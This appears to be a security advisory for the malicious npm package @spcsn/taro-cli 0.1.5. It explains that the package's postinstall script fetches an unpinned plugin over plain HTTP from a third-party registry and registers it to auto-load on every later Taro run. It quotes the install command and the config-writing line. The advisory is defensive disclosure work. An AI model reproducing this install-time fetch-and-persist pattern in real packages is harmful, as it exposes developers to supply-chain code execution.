VYPR

npm · Malicious package advisory

Malware

@spcsn/taro-cli

MAL-2026-4447

Malicious code in @spcsn/taro-cli (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (10e2baba3a5166ecf1196146e1b2a8771836b25bd7f8d56979e3e277a3de9625)
The package's postinstall script probes https://taro.jd.com/ and then invokes its own CLI to run `npm install @jdtaro/plugin-build-report-performance@latest --registry http://registry.m.jd.com` inside the user's global Taro config directory (~/.taro). The plugin is fetched over plain HTTP (no TLS) at the mutable `@latest` tag from a third-party registry (registry.m.jd.com), not from npmjs.org and not from the package's own publisher infrastructure. After install, the plugin name is appended to the global plugins list (`fs.writeJSONSync(configFilePath, { [configKey]: configItem })`), so it is auto-loaded on every subsequent `taro` invocation. This is an unpinned, plain-HTTP, third-party code fetch executed at install time and persisted across future builds — an attacker able to MITM HTTP traffic to registry.m.jd.com (or the registry operator itself, given `@latest`) can substitute arbitrary code that runs whenever the developer later runs Taro. The behavior is undocumented (README is empty) and silently enrolls every installer into a JD-operated build-reporting plugin without consent.

Compromised versions (1)

  • 0.1.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.